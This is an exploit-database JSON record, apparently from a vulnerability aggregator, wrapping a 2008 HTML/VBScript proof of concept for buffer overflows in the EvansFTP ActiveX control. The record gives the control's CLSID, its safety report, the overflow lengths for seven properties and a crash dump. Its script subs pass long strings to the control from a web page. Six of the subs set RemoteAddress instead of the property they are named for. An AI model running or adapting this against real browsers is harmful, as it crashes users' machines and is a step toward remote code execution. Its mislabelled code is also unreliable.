{"id": "EDB-ID:7460", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)", "description": "", "published": "2008-12-14T00:00:00", "modified": "2008-12-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/7460", "reporter": "Bl@ckbe@rD", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T07:03:41", "viewCount": 14, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://www.exploit-db.com/download/7460", "sourceData": "<HTML>\r\n<package><job id='DoneInVBS' debug='false' error='true'>\r\n<object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' />\r\n<HEAD>\r\n <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE>\r\n</HEAD>\r\n<BODY>\r\n[+] Application : EvansFTP ActiveX <br>\r\n[+] CompanyName : Evans Programming <br>\r\n[+] Description : Multi-threaded asynchronus Active-X FTP Control<br>\r\n[+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br>\r\n[+] Exploit : Remote BoF (PoC)<br>\r\n[+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br>\r\n[+] Object Safety Report :<br>\r\nReport for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br>\r\nRegKey Safe for Script: Faux<br>\r\nRegKey Safe for Init: Faux<br>\r\nImplements IObjectSafety: Vrai<br>\r\nIDisp Safe: Safe for untrusted: caller,data <br>\r\nIPStorage Safe: Safe for untrusted: caller,data <br><br>\r\nRegKey Safe for Script: Faux<br>\r\nRegkeySafe for Init: Faux<br>\r\nKillBitSet: Faux<br>\r\n<br><br>\r\nThe Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br>\r\n1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br>\r\n2- ProxyPrefix 
suffers from a BoF when we pass a string over 1044 <br>\r\n3- ProxyName suffers from a BoF when we pass a string over 1044 <br>\r\n4- Password suffers from a BoF when we pass a string over 1044 <br>\r\n5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br>\r\n6- LoginName suffers from a BoF when we pass a string over 1044 <br>\r\n7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br>\r\nDisASM RemoteAddress Crash :<br><pre>\r\n7C809EEC MOV AL,[EDX] (KERNEL32.dll)\r\n \r\n7C809ED4 TEST EDX,EDX\r\n7C809ED6 JE 7C80C858\r\n7C809EDC LEA EDI,[EDX+EAX-1]\r\n7C809EE0 CMP EDI,EDX\r\n7C809EE2 JB 7C80C858\r\n7C809EE8 AND DWORD PTR [EBP-4],0\r\n7C809EEC MOV AL,[EDX] <--- CRASH\r\n \r\nEBP+8 FEEEFEEE\r\nStack Dump:\r\n13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00\r\n \r\n</pre>\r\n<script language='vbscript'>\r\nSub RemoteAddress\r\narg1=String(2068, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyPrefix\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyName\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub Password\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyBypassList\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub LoginName\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub CurrentDirectory\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n</script><br><br>\r\n \r\n<INPUT TYPE=\"button\" VALUE=\"RemoteAddress PoC\" ONCLICK=RemoteAddress()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyPrefix PoC\" ONCLICK=ProxyPrefix()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyName PoC\" ONCLICK=ProxyName()>\r\n<INPUT TYPE=\"button\" VALUE=\"Password PoC\" ONCLICK=Password()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyBypassList PoC\" ONCLICK=ProxyBypassList()>\r\n<INPUT TYPE=\"button\" VALUE=\"LoginName PoC\" ONCLICK=LoginName()>\r\n<INPUT 
TYPE=\"button\" VALUE=\"CurrentDirectory PoC\" ONCLICK=CurrentDirectory()><br><br>\r\nBrought to You by Bl@ckbe@rD<br>\r\nPeace xD\r\n </BODY>\r\n</HTML>\r\n\r\n# milw0rm.com [2008-12-14]", "osvdbidlist": ["57365"], "exploitType": "dos", "verified": true, "_state": {"dependencies": 1645222215}}